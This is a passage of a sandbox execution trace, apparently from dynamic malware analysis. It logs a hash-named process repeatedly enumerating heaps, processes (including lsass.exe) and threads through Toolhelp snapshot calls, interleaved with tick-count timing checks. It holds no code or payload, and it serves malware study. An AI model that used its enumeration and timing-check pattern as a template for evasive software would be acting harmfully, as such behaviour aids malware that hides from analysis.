(lphe=0x30fefc0) returned 1 [0182.354] GetTickCount () returned 0xde5a [0182.354] GetCurrentThreadId () returned 0x264 [0182.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.354] Heap32Next (lphe=0x30fefc0) returned 1 [0182.377] GetTickCount () returned 0xde6a [0182.377] GetCurrentThreadId () returned 0x264 [0182.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.377] Heap32Next (lphe=0x30fefc0) returned 1 [0182.399] GetTickCount () returned 0xde89 [0182.399] Heap32ListNext (hSnapshot=0x594, lphl=0x30ff454) returned 1 [0182.400] GetTickCount () returned 0xde89 [0182.400] GetTickCount () returned 0xde89 [0182.400] Process32First (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.401] GetCurrentThreadId () returned 0x264 [0182.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.402] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.403] GetTickCount () returned 0xde89 [0182.403] GetCurrentThreadId () returned 0x264 [0182.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.403] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.405] GetTickCount () returned 0xde89 [0182.405] GetCurrentThreadId () returned 0x264 [0182.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.405] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.407] GetTickCount () returned 0xde89 [0182.407] GetCurrentThreadId () returned 0x264 [0182.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.407] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x138, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.409] GetTickCount () returned 0xde89 [0182.409] GetCurrentThreadId () returned 0x264 [0182.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.410] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x15c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.411] GetTickCount () returned 0xde89 [0182.411] GetCurrentThreadId () returned 0x264 [0182.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.412] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x15c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.413] GetTickCount () returned 0xde89 [0182.413] GetCurrentThreadId () returned 0x264 [0182.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.413] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x164, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.422] GetTickCount () returned 0xde99 [0182.422] GetCurrentThreadId () returned 0x264 [0182.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.422] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x164, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.423] GetTickCount () returned 0xde99 [0182.423] GetCurrentThreadId () returned 0x264 [0182.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.424] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x164, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0182.425] GetTickCount () returned 0xde99 [0182.425] GetCurrentThreadId () returned 0x264 [0182.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.426] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.427] GetTickCount () returned 0xde99 [0182.427] GetCurrentThreadId () returned 0x264 [0182.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.428] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.429] GetTickCount () returned 0xde99 [0182.429] GetCurrentThreadId () returned 0x264 [0182.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.430] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.432] GetTickCount () returned 0xdea8 [0182.432] GetCurrentThreadId () returned 0x264 [0182.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.433] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.434] GetTickCount () returned 0xdea8 [0182.434] GetCurrentThreadId () returned 0x264 [0182.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.435] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.436] GetTickCount () returned 0xdea8 [0182.436] GetCurrentThreadId () returned 0x264 [0182.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.436] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.437] GetTickCount () returned 0xdea8 [0182.438] GetCurrentThreadId () returned 0x264 [0182.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.438] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.440] GetTickCount () returned 0xdea8 [0182.440] GetCurrentThreadId () returned 0x264 [0182.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.440] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x388, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.442] GetTickCount () returned 0xdea8 [0182.442] GetCurrentThreadId () returned 0x264 [0182.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.442] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.443] GetTickCount () returned 0xdea8 [0182.443] GetCurrentThreadId () returned 0x264 [0182.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.444] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0182.445] GetTickCount () returned 0xdea8 [0182.446] GetCurrentThreadId () returned 0x264 [0182.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.446] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.447] GetTickCount () returned 0xdeb8 [0182.447] GetCurrentThreadId () returned 0x264 [0182.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.448] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mscorsvw.exe")) returned 1 [0182.449] GetTickCount () returned 0xdeb8 [0182.449] GetCurrentThreadId () returned 0x264 [0182.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.449] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mscorsvw.exe")) returned 1 [0182.451] GetTickCount () returned 0xdeb8 [0182.451] GetCurrentThreadId () returned 0x264 [0182.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.451] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0182.453] GetTickCount () returned 0xdeb8 [0182.453] GetCurrentThreadId () returned 0x264 [0182.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.453] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.454] GetTickCount () returned 0xdeb8 [0182.454] GetCurrentThreadId () returned 0x264 [0182.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.455] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x654, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.456] GetTickCount () returned 0xdeb8 [0182.456] GetCurrentThreadId () returned 0x264 [0182.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.456] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x778, pcPriClassBase=13, dwFlags=0x0, szExeFile="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 1 [0182.458] GetTickCount () returned 0xdeb8 [0182.458] GetCurrentThreadId () returned 0x264 [0182.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.458] Process32Next (in: hSnapshot=0x594, lppe=0x30ff258 | out: lppe=0x30ff258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x778, pcPriClassBase=13, dwFlags=0x0, szExeFile="12471d61dc844208bdbe??????????????????????????????????")) returned 0 [0182.460] GetTickCount () returned 0xdeb8 [0182.460] Thread32First (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.461] GetCurrentThreadId () returned 0x264 [0182.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.462] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.463] GetTickCount () returned 0xdec8 [0182.463] GetCurrentThreadId () returned 0x264 [0182.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.463] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.465] GetTickCount () returned 0xdec8 [0182.465] GetCurrentThreadId () returned 0x264 [0182.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.465] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.466] GetTickCount () returned 0xdec8 [0182.466] GetCurrentThreadId () returned 0x264 [0182.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.467] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.468] GetTickCount () returned 0xdec8 [0182.468] GetCurrentThreadId () returned 0x264 [0182.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.469] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.470] GetTickCount () returned 0xdec8 [0182.470] GetCurrentThreadId () returned 0x264 [0182.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.470] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.472] GetTickCount () returned 0xdec8 [0182.472] GetCurrentThreadId () returned 0x264 [0182.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.472] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.473] GetTickCount () returned 0xdec8 [0182.473] GetCurrentThreadId () returned 0x264 [0182.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.474] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.475] GetTickCount () returned 0xdec8 [0182.475] GetCurrentThreadId () returned 0x264 [0182.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.475] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.476] GetTickCount () returned 0xdec8 [0182.476] GetCurrentThreadId () returned 0x264 [0182.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.477] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.478] GetTickCount () returned 0xded7 [0182.478] GetCurrentThreadId () returned 0x264 [0182.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.479] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.480] GetTickCount () returned 0xded7 [0182.480] GetCurrentThreadId () returned 0x264 [0182.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.481] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.482] GetTickCount () returned 0xded7 [0182.482] GetCurrentThreadId () returned 0x264 [0182.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.483] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.484] GetTickCount () returned 0xded7 [0182.484] GetCurrentThreadId () returned 0x264 [0182.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.484] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.485] GetTickCount () returned 0xded7 [0182.485] GetCurrentThreadId () returned 0x264 [0182.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.485] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.487] GetTickCount () returned 0xded7 [0182.487] GetCurrentThreadId () returned 0x264 [0182.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.487] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.488] GetTickCount () returned 0xded7 [0182.488] GetCurrentThreadId () returned 0x264 [0182.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.488] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.490] GetTickCount () returned 0xded7 [0182.490] GetCurrentThreadId () returned 0x264 [0182.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.490] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.491] GetTickCount () returned 0xded7 [0182.491] GetCurrentThreadId () returned 0x264 [0182.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.491] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.492] GetTickCount () returned 0xdee7 [0182.492] GetCurrentThreadId () returned 0x264 [0182.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.493] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.494] GetTickCount () returned 0xdee7 [0182.494] GetCurrentThreadId () returned 0x264 [0182.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.495] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.496] GetTickCount () returned 0xdee7 [0182.496] GetCurrentThreadId () returned 0x264 [0182.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.497] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.498] GetTickCount () returned 0xdee7 [0182.498] GetCurrentThreadId () returned 0x264 [0182.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.498] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.500] GetTickCount () returned 0xdee7 [0182.500] GetCurrentThreadId () returned 0x264 [0182.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 